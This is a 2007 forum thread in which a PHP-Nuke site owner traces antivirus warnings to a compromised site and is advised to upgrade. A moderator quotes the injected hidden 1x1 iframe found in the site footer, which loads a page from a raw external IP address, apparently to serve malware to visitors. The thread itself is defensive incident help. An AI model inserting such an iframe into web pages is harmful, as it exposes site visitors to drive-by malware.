Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> General/Other Stuff
Author Message
fondy
Regular
Regular


Joined: Sep 12, 2003
Posts: 55

PostPosted: Mon Sep 24, 2007 4:49 am Reply with quote

Hi

have a phpnuke site version 6.5. When I goes into the site using IE, the sites come up, but Symantec says 'Bloodhound.Exploit.109' trojan is on your computer.

Using Mozilla Firefox I got no such messages.

I visitor using Mcafee virus scanner and IE got the message: 'JS/Downloader-AUD', script execution blocked.

Is some php scripts hacked?

regards fondy
 
View user's profile Send private message Visit poster's website
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9456
Location: Arizona

PostPosted: Mon Sep 24, 2007 6:19 am Reply with quote

Well, here is the text from the Symantec site:

Quote:

Bloodhound.Exploit.109 is a heuristic detection for Apple QuickTime RTSP URI Remote Buffer Overflow Vulnerability. An attacker who exploits this vulnerability could perform a denial-of-service attack against a vulnerable version of QuickTime, or potentially execute arbitrary code with the privileges of the logged-on user. The exploit is triggered by opening a specially-crafted QTL file.

Applies to: Apple QuickTime Player 7.1.3

Files that are detected as Bloodhound.Exploit.109 may be malicious. We suggest that you submit to Symantec Security Response any files that are detected as Bloodhound.Exploit.109.


I would definitely look your site over and see what file is causing this and then you have to figure out how that file got on your site.

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
jakec
Site Admin


Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

PostPosted: Mon Sep 24, 2007 6:21 am Reply with quote

Are you using any sort of encryption on your site? Maybe a theme you use?

I have seen this cause false positives when using McAfee on some sites.
 
View user's profile Send private message
fondy
PostPosted: Mon Sep 24, 2007 6:39 am Reply with quote

Hi

thanks for your answers.

Montego: Yes, will check the files and scripts. The problem with the virus startet a week ago. When I check the time stamps on the files, they are a lot older.

Jakec: No, I do not use encryption of any sort.

The link to my site: Only registered users can see links on this board! Get registered or login!

Will start looking at the files.

regards
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Mon Sep 24, 2007 5:22 pm Reply with quote

You have a suspicious iframe in your footer

Code:
iframe src=http://81.29.241.229/usr2/andrew/index.php?id=290 width=1 height=1


My guess is that is setting off the virus checker

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
fondy
PostPosted: Tue Sep 25, 2007 12:54 am Reply with quote

Evader99, thanks !!

Yes, the config table and the copyright field is updated with iframe last week or so.

I dont know how anyone can update the config table. Have a secure database with id and passwords.

In any case, all is ok now, thanks !!

Regards
 
evaders99
PostPosted: Tue Sep 25, 2007 12:59 am Reply with quote

Simple - SQL Injection. Somewhere your script has a vulnerability, given that its such an old version (6.5), I wouldn't be surprised. If you don't want your site hacked, you'll need to upgrade.
 
fondy
PostPosted: Tue Sep 25, 2007 1:40 am Reply with quote

Agree to upgrade, have several domains using ravennuke 2.10.01

Will start to upgrade to this version and using sentinel.

Thanks Smile
 
fondy
PostPosted: Thu Sep 27, 2007 6:28 am Reply with quote

Upgrading from nuke 6.5 to Ravennuke 2.10.01 with sentinel 2.5.08 finished.

No more Bloodhound and alike

Smile

Regards
 
montego
PostPosted: Thu Sep 27, 2007 6:31 am Reply with quote

I would not stop there on NukeSentinel. I would get the latest upgrade pack and apply it as well. It is a CRITICAL update.
 
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Thu Sep 27, 2007 6:33 am Reply with quote

Well done ! You should also update NukeSentinel and IP2Country. Smile
 
View user's profile Send private message
fondy
PostPosted: Thu Sep 27, 2007 7:04 am Reply with quote

Hi

thanks!

Have now upgraded to the latest IP2Country distribution.

Assume there will be a lot of work to upgrade to latest Sentinel, but I have to try

Smile

Regards fondy
 
Susann
PostPosted: Thu Sep 27, 2007 7:28 am Reply with quote

Its a simple procedure download NukeSentinel 2.5.12 from nukescripts run nsnst.php and select 2.5.08 - 2.5.09 etc. until you reach Nuke Sentinelversion 2.5.12
 
fondy
PostPosted: Thu Sep 27, 2007 7:31 am Reply with quote

Yes Susann, it was very simple. NowI have latest IP2Country and Sentinel 2.5.12, Great !

Thanks a lot

Regards fondy
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> General/Other Stuff

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©